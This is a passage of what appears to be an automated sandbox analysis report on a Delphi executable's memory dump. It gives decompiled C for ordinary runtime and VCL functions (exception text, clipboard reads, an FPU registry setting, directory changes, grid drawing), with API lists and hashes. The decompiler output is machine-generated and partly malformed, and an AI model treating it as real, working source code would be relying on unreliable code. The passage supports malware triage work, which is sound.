                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                        • LoadStringA.USER32 ref: 0040A032
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID: x@
                                                                        • API String ID: 3990497365-1446391196
                                                                        • Opcode ID: 675b2fcfc3af4e0b804cb0a88e9fa82d5beafd49b275f10cabf8e41c51dc7240
                                                                        • Instruction ID: 8b082e9917efa6b49bae10a68e7f34f77849aa4765b44cfb24a4ba26b6d89490
                                                                        • Opcode Fuzzy Hash: 675b2fcfc3af4e0b804cb0a88e9fa82d5beafd49b275f10cabf8e41c51dc7240
                                                                        • Instruction Fuzzy Hash: CA412E70A002589BDB21DF69CD85BDAB7BCAB08304F0040FAA548F7292D7799F948F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409F3E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409F3E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L3:
					_t40 =  *0x496714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409F34(_t74);
				} else {
					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
					_t101 = _t72;
					if(_t72 != 0) {
						_t77 = _t74 - _v820.AllocationBase;
						__eflags = _t77;
						_v12 = _t77;
					} else {
						goto L3;
					}
				}
				E00408C5C( &_v273, 0x104, E0040ACE8(0x5c, _t101) + 1);
				_t75 = 0x40a0c0;
				_t89 = 0x40a0c0;
				_t85 =  *0x4077d4; // 0x407820
				if(E00403768(_t92, _t85) != 0) {
					_t75 = E004047F8( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408BF8(_t75, 0x40a0c0);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a0c4;
					}
				}
				_t51 =  *0x495c1c; // 0x407594
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x496714; // 0x400000
				LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
				E0040352C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E0040932C(_v8,  &_v790, _a4, 4,  &_v860);
				return E00408BF8(_v8, _t89);
			}
































                                                                        0x00409f4c
                                                                        0x00409f4f
                                                                        0x00409f51
                                                                        0x00409f5d
                                                                        0x00409f6c
                                                                        0x00409f8a
                                                                        0x00409f96
                                                                        0x00409f9c
                                                                        0x00409fa8
                                                                        0x00409f6e
                                                                        0x00409f81
                                                                        0x00409f86
                                                                        0x00409f88
                                                                        0x00409fad
                                                                        0x00409fad
                                                                        0x00409fb3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00409f88
                                                                        0x00409fd1
                                                                        0x00409fd6
                                                                        0x00409fdb
                                                                        0x00409fe2
                                                                        0x00409fef
                                                                        0x00409ff9
                                                                        0x00409ffd
                                                                        0x0040a004
                                                                        0x0040a00d
                                                                        0x0040a00d
                                                                        0x0040a004
                                                                        0x0040a01e
                                                                        0x0040a023
                                                                        0x0040a027
                                                                        0x0040a032
                                                                        0x0040a03f
                                                                        0x0040a04a
                                                                        0x0040a050
                                                                        0x0040a05d
                                                                        0x0040a063
                                                                        0x0040a06d
                                                                        0x0040a073
                                                                        0x0040a07a
                                                                        0x0040a080
                                                                        0x0040a087
                                                                        0x0040a08d
                                                                        0x0040a0a9
                                                                        0x0040a0bc

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                        • LoadStringA.USER32 ref: 0040A032
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID: x@
                                                                        • API String ID: 3990497365-1446391196
                                                                        • Opcode ID: 9a548920c42f45fa99c43c4b2d529c9c7306f1bd2938faf4c3a7a4c4b8425f55
                                                                        • Instruction ID: ae1d460a213a262a2de6a5e3c25968941e4e7f8d5fcce27913c57a7a7444fe46
                                                                        • Opcode Fuzzy Hash: 9a548920c42f45fa99c43c4b2d529c9c7306f1bd2938faf4c3a7a4c4b8425f55
                                                                        • Instruction Fuzzy Hash: 36412F70A002589BDB21DF69CD85BDAB7BCAB08304F0040FAB548F7292D7799F948F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042FBE8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66clipboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E0042FBE8(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				void* __ecx;
				void* __ebp;
				void* _t16;
				void* _t20;
				void* _t24;
				void* _t25;
				signed short _t26;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t48;
				intOrPtr _t51;

				_t43 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
				_push(_t51);
				_push(0x42fc8a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51;
				_t26 = EnumClipboardFormats(0);
				_t52 = _t26;
				if(_t26 == 0) {
					L4:
					_t29 =  *0x495908; // 0x41d78c
					E0040A238(_t29, 1);
					E00403DA8();
					__eflags = 0;
					_pop(_t38);
					 *[fs:eax] = _t38;
					return  *((intOrPtr*)( *_v8 + 0x14))(0x42fc91);
				} else {
					while(1) {
						_t16 = E004224D0(_t26, _t52);
						_t53 = _t16;
						if(_t16 != 0) {
							break;
						}
						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
						__eflags = _t26;
						if(__eflags != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					_t20 = GetClipboardData(_t26 & 0x0000ffff);
					E004223E0(_t43, _t20, _t26, _t53, GetClipboardData(9));
					_t24 = E00403E54();
					return _t24;
				}
				L6:
			}



















                                                                        0x0042fbef
                                                                        0x0042fbf1
                                                                        0x0042fbf9
                                                                        0x0042fbfe
                                                                        0x0042fbff
                                                                        0x0042fc04
                                                                        0x0042fc07
                                                                        0x0042fc11
                                                                        0x0042fc13
                                                                        0x0042fc16
                                                                        0x0042fc5d
                                                                        0x0042fc5d
                                                                        0x0042fc6a
                                                                        0x0042fc6f
                                                                        0x0042fc74
                                                                        0x0042fc76
                                                                        0x0042fc79
                                                                        0x0042fc89
                                                                        0x0042fc18
                                                                        0x0042fc18
                                                                        0x0042fc1f
                                                                        0x0042fc24
                                                                        0x0042fc26
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042fc56
                                                                        0x0042fc58
                                                                        0x0042fc5b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042fc5b
                                                                        0x0042fc2c
                                                                        0x0042fc41
                                                                        0x0042fc46
                                                                        0x0042fc96
                                                                        0x0042fc96
                                                                        0x00000000

                                                                        APIs
                                                                        • EnumClipboardFormats.USER32(00000000,00000000,0042FC8A), ref: 0042FC0C
                                                                        • GetClipboardData.USER32 ref: 0042FC2C
                                                                        • GetClipboardData.USER32 ref: 0042FC35
                                                                        • EnumClipboardFormats.USER32(00000000,00000000,00000000,0042FC8A), ref: 0042FC51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Clipboard$DataEnumFormats
                                                                        • String ID: x@
                                                                        • API String ID: 1256399260-1446391196
                                                                        • Opcode ID: 5a6158a96a4f1d023fa36d5631eca6709ac33564e94456df72d8ef5d7ea42a59
                                                                        • Instruction ID: 6727d5747eb2cfb6d4763b554848f51aca0207427aa4671af987d0115a5538be
                                                                        • Opcode Fuzzy Hash: 5a6158a96a4f1d023fa36d5631eca6709ac33564e94456df72d8ef5d7ea42a59
                                                                        • Instruction Fuzzy Hash: CC110630704214AFD700FF6BE95292A77E9EF853587A0407BFC04D7381C939AC05D669
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403454, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00403454() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x47a00c & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x47a00c; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x47a00c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004034C5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034cc);
					return RegCloseKey(_v8);
				}
			}












                                                                        0x00403455
                                                                        0x00403457
                                                                        0x00403461
                                                                        0x0040347d
                                                                        0x004034cc
                                                                        0x004034de
                                                                        0x004034e1
                                                                        0x004034ea
                                                                        0x0040347f
                                                                        0x00403481
                                                                        0x00403482
                                                                        0x00403487
                                                                        0x0040348a
                                                                        0x0040348d
                                                                        0x004034a9
                                                                        0x004034b0
                                                                        0x004034b3
                                                                        0x004034b6
                                                                        0x004034c4
                                                                        0x004034c4

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403476
                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034A9
                                                                        • RegCloseKey.ADVAPI32(?,004034CC,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034BF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                        • API String ID: 3677997916-4173385793
                                                                        • Opcode ID: 350ae91fbd18333f4bfa6cae6bba187b28a893344676598df037652048d21920
                                                                        • Instruction ID: 120532c505e53d0c70db7bdd28f63d547cb0a312e52158abe3e5b934d02c6540
                                                                        • Opcode Fuzzy Hash: 350ae91fbd18333f4bfa6cae6bba187b28a893344676598df037652048d21920
                                                                        • Instruction Fuzzy Hash: F001B575510308BAE711EF91CC42BAE7BACD704B05F1045B6F908F65D0E6799A10C75C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402924, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00402924(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E004045B0(_t25, 0x105,  &_v532);
			}










                                                                        0x0040292c
                                                                        0x0040292e
                                                                        0x00402932
                                                                        0x0040293c
                                                                        0x0040293f
                                                                        0x00402944
                                                                        0x00402956
                                                                        0x0040295c
                                                                        0x0040295c
                                                                        0x0040296b
                                                                        0x00402972
                                                                        0x0040297c
                                                                        0x0040297c
                                                                        0x00402999

                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046650B), ref: 00402956
                                                                        • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046650B), ref: 0040295C
                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046650B), ref: 0040296B
                                                                        • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046650B), ref: 0040297C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CurrentDirectory
                                                                        • String ID: :
                                                                        • API String ID: 1611563598-336475711
                                                                        • Opcode ID: d2c8346d54f6d26374d7a20a1d44905b814254075feb8a7149b64a100b0b6c82
                                                                        • Instruction ID: 65af94f08173e3417ccc1a5c10f762e489d2bb018a98be52c56f19f3046a90dd
                                                                        • Opcode Fuzzy Hash: d2c8346d54f6d26374d7a20a1d44905b814254075feb8a7149b64a100b0b6c82
                                                                        • Instruction Fuzzy Hash: 01F096622487805ED310E6788856BDB73DC9F55704F04846EBAC8E73C2F6B889449767
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045CDD8, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E0045CDD8(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				char _v16;
				signed int _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				struct tagRECT _v65;
				void* __edi;
				void* __ebp;
				intOrPtr _t138;
				intOrPtr _t148;
				signed int _t163;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t188;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr* _t240;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr _t256;
				signed int _t257;
				void* _t265;

				_v12 = __ecx;
				_v8 = __eax;
				_t240 = _a24 + 0xfffffffc;
				_v16 = __edx;
				_v49.top = _a20;
				while(1) {
					_t138 = _v49.top;
					if(_t138 >= _a12) {
						break;
					}
					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
					if(_t138 > _v16) {
						_t257 = _v8;
						_v49.left = _v12;
						_v49.bottom = E004607E0( *_t240, _v16) + _v49.top;
						while(1) {
							__eflags = _v49.left - _a16;
							if(_v49.left >= _a16) {
								break;
							}
							_t148 =  *_t240;
							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
								_v49.right = E004607C0( *_t240, _t257) + _v49.left;
								__eflags = _v49.right - _v49.left;
								if(_v49.right <= _v49.left) {
									L39:
									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
									_t257 = _t257 + 1;
									__eflags = _t257;
									continue;
								}
								__eflags = RectVisible(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
								if(__eflags == 0) {
									goto L39;
								} else {
									_v17 = _a4;
									_t163 = E0045C608( *_t240, __eflags);
									__eflags = _t163;
									if(_t163 != 0) {
										_t236 =  *_t240;
										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
											_t238 =  *_t240;
											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
												_t24 =  &_v17;
												 *_t24 = _v17 | 0x00000002;
												__eflags =  *_t24;
											}
										}
									}
									_t242 = _a24 - 0x80;
									_t166 = E0045B33C(_t257, _a24 - 0x80, _v16);
									__eflags = _t166;
									if(_t166 != 0) {
										_t29 =  &_v17;
										 *_t29 = _v17 | 0x00000001;
										__eflags =  *_t29;
									}
									__eflags = _v17 & 0x00000002;
									if((_v17 & 0x00000002) == 0) {
										L14:
										_t167 =  *_t240;
										__eflags =  *((char*)(_t167 + 0x28c));
										if( *((char*)(_t167 + 0x28c)) != 0) {
											L16:
											_t260 =  *((intOrPtr*)( *_t240 + 0x208));
											E0042062C( *((intOrPtr*)( *_t240 + 0x208)));
											__eflags = _v17 & 0x00000001;
											if(__eflags == 0) {
												L20:
												E0041FC50( *((intOrPtr*)(_t260 + 0x14)), _t242, _a8, _t257, _t265, __eflags);
												L21:
												E004202E8(_t260,  &_v49);
												L22:
												 *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 0xd4))(_v17,  &_v49);
												_t180 =  *_t240;
												__eflags =  *((char*)(_t180 + 0x28c));
												if( *((char*)(_t180 + 0x28c)) != 0) {
													__eflags = _v17 & 0x00000004;
													if((_v17 & 0x00000004) != 0) {
														_t201 =  *_t240;
														__eflags =  *((char*)(_t201 + 0x1a5));
														if( *((char*)(_t201 + 0x1a5)) != 0) {
															_t202 = _a24;
															_t253 = _a24;
															__eflags =  *(_t202 - 0x84) |  *(_t253 - 0x88);
															if(( *(_t202 - 0x84) |  *(_t253 - 0x88)) != 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t257 = _t257;
																_t205 = _a24;
																__eflags =  *(_t205 - 0x84) & 0x00000004;
																if(( *(_t205 - 0x84) & 0x00000004) != 0) {
																	_t206 = _a24;
																	__eflags =  *(_t206 - 0x84) & 0x00000008;
																	if(( *(_t206 - 0x84) & 0x00000008) == 0) {
																		_t88 =  &(_v65.bottom);
																		 *_t88 = _v65.bottom +  *((intOrPtr*)(_a24 - 0x40));
																		__eflags =  *_t88;
																	}
																} else {
																	_v65.right = _v65.right +  *((intOrPtr*)(_a24 - 0x70));
																}
																DrawEdge(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x84));
																DrawEdge(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v65, 4,  *(_a24 - 0x88));
															}
														}
													}
												}
												_t181 =  *_t240;
												__eflags =  *((char*)(_t181 + 0x28c));
												if( *((char*)(_t181 + 0x28c)) != 0) {
													_t182 =  *_t240;
													__eflags =  *(_t182 + 0x1c) & 0x00000010;
													if(( *(_t182 + 0x1c) & 0x00000010) == 0) {
														__eflags = _v17 & 0x00000002;
														if((_v17 & 0x00000002) != 0) {
															_t183 =  *_t240;
															_t252 =  *0x45d10c; // 0x2400
															__eflags = _t252 - ( *(_t183 + 0x248) &  *0x45d10c);
															if(_t252 != ( *(_t183 + 0x248) &  *0x45d10c)) {
																__eflags =  *( *_t240 + 0x249) & 0x00000010;
																if(__eflags == 0) {
																	_t188 = E004037D8( *_t240, __eflags);
																	__eflags = _t188;
																	if(_t188 != 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		asm("movsd");
																		_t257 = _t257;
																		_v33.left = _v49.right;
																		_v33.right = _v49.left;
																		DrawFocusRect(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v33);
																	} else {
																		DrawFocusRect(E00420730( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
																	}
																}
															}
														}
													}
												}
												goto L39;
											}
											__eflags = _v17 & 0x00000002;
											if(__eflags == 0) {
												L19:
												E0041FC50( *((intOrPtr*)(_t260 + 0x14)), _t242, 0x8000000d, _t257, _t265, __eflags);
												E0041F464( *((intOrPtr*)(_t260 + 0xc)), 0x8000000e);
												goto L21;
											}
											_t256 =  *0x45d108; // 0x0
											__eflags = _t256 - ( *( *_t240 + 0x248) &  *0x45d104);
											if(__eflags == 0) {
												goto L20;
											}
											goto L19;
										}
										_t232 =  *_t240;
										__eflags =  *(_t232 + 0x1c) & 0x00000010;
										if(( *(_t232 + 0x1c) & 0x00000010) == 0) {
											goto L22;
										}
										goto L16;
									}
									_t233 =  *_t240;
									__eflags =  *(_t233 + 0x249) & 0x00000004;
									if(( *(_t233 + 0x249) & 0x00000004) == 0) {
										goto L14;
									}
									_t234 =  *_t240;
									__eflags =  *((char*)(_t234 + 0x28d));
									if( *((char*)(_t234 + 0x28d)) == 0) {
										goto L14;
									}
									_t235 =  *_t240;
									__eflags =  *(_t235 + 0x1c) & 0x00000010;
									if(( *(_t235 + 0x1c) & 0x00000010) == 0) {
										goto L39;
									}
									goto L14;
								}
							}
							break;
						}
						_v49.top =  *((intOrPtr*)(_a24 - 0x40)) + _v49.bottom;
						_t130 =  &_v16;
						 *_t130 = _v16 + 1;
						__eflags =  *_t130;
						continue;
					}
					break;
				}
				return _t138;
			}






































                                                                        0x0045cde1
                                                                        0x0045cde4
                                                                        0x0045cdea
                                                                        0x0045cded
                                                                        0x0045cdf3
                                                                        0x0045d0e1
                                                                        0x0045d0e1
                                                                        0x0045d0e7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045d0eb
                                                                        0x0045d0f4
                                                                        0x0045cdfb
                                                                        0x0045ce01
                                                                        0x0045ce11
                                                                        0x0045d0bc
                                                                        0x0045d0bf
                                                                        0x0045d0c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045d0c4
                                                                        0x0045d0c6
                                                                        0x0045d0cc
                                                                        0x0045ce25
                                                                        0x0045ce2b
                                                                        0x0045ce2e
                                                                        0x0045d0af
                                                                        0x0045d0b8
                                                                        0x0045d0bb
                                                                        0x0045d0bb
                                                                        0x00000000
                                                                        0x0045d0bb
                                                                        0x0045ce4b
                                                                        0x0045ce4d
                                                                        0x00000000
                                                                        0x0045ce53
                                                                        0x0045ce56
                                                                        0x0045ce5b
                                                                        0x0045ce60
                                                                        0x0045ce62
                                                                        0x0045ce64
                                                                        0x0045ce6c
                                                                        0x0045ce6f
                                                                        0x0045ce71
                                                                        0x0045ce73
                                                                        0x0045ce79
                                                                        0x0045ce7b
                                                                        0x0045ce7b
                                                                        0x0045ce7b
                                                                        0x0045ce7b
                                                                        0x0045ce79
                                                                        0x0045ce6f
                                                                        0x0045ce82
                                                                        0x0045ce8a
                                                                        0x0045ce8f
                                                                        0x0045ce91
                                                                        0x0045ce93
                                                                        0x0045ce93
                                                                        0x0045ce93
                                                                        0x0045ce93
                                                                        0x0045ce97
                                                                        0x0045ce9b
                                                                        0x0045cebf
                                                                        0x0045cebf
                                                                        0x0045cec1
                                                                        0x0045cec8
                                                                        0x0045ced2
                                                                        0x0045ced4
                                                                        0x0045cee1
                                                                        0x0045cee6
                                                                        0x0045ceea
                                                                        0x0045cf2a
                                                                        0x0045cf30
                                                                        0x0045cf35
                                                                        0x0045cf3a
                                                                        0x0045cf3f
                                                                        0x0045cf50
                                                                        0x0045cf56
                                                                        0x0045cf58
                                                                        0x0045cf5f
                                                                        0x0045cf65
                                                                        0x0045cf69
                                                                        0x0045cf6f
                                                                        0x0045cf71
                                                                        0x0045cf78
                                                                        0x0045cf7e
                                                                        0x0045cf87
                                                                        0x0045cf8a
                                                                        0x0045cf90
                                                                        0x0045cf99
                                                                        0x0045cf9a
                                                                        0x0045cf9b
                                                                        0x0045cf9c
                                                                        0x0045cf9d
                                                                        0x0045cf9e
                                                                        0x0045cfa1
                                                                        0x0045cfa8
                                                                        0x0045cfb5
                                                                        0x0045cfb8
                                                                        0x0045cfbf
                                                                        0x0045cfc7
                                                                        0x0045cfc7
                                                                        0x0045cfc7
                                                                        0x0045cfc7
                                                                        0x0045cfaa
                                                                        0x0045cfb0
                                                                        0x0045cfb0
                                                                        0x0045cfe8
                                                                        0x0045d00b
                                                                        0x0045d00b
                                                                        0x0045cf90
                                                                        0x0045cf78
                                                                        0x0045cf69
                                                                        0x0045d010
                                                                        0x0045d012
                                                                        0x0045d019
                                                                        0x0045d01f
                                                                        0x0045d021
                                                                        0x0045d025
                                                                        0x0045d02b
                                                                        0x0045d02f
                                                                        0x0045d031
                                                                        0x0045d041
                                                                        0x0045d048
                                                                        0x0045d04b
                                                                        0x0045d04f
                                                                        0x0045d056
                                                                        0x0045d05e
                                                                        0x0045d063
                                                                        0x0045d065
                                                                        0x0045d087
                                                                        0x0045d088
                                                                        0x0045d089
                                                                        0x0045d08a
                                                                        0x0045d08b
                                                                        0x0045d08f
                                                                        0x0045d095
                                                                        0x0045d0aa
                                                                        0x0045d067
                                                                        0x0045d079
                                                                        0x0045d079
                                                                        0x0045d065
                                                                        0x0045d056
                                                                        0x0045d04b
                                                                        0x0045d02f
                                                                        0x0045d025
                                                                        0x00000000
                                                                        0x0045d019
                                                                        0x0045ceec
                                                                        0x0045cef0
                                                                        0x0045cf0e
                                                                        0x0045cf16
                                                                        0x0045cf23
                                                                        0x00000000
                                                                        0x0045cf23
                                                                        0x0045cf02
                                                                        0x0045cf09
                                                                        0x0045cf0c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045cf0c
                                                                        0x0045ceca
                                                                        0x0045cecc
                                                                        0x0045ced0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ced0
                                                                        0x0045ce9d
                                                                        0x0045ce9f
                                                                        0x0045cea6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045cea8
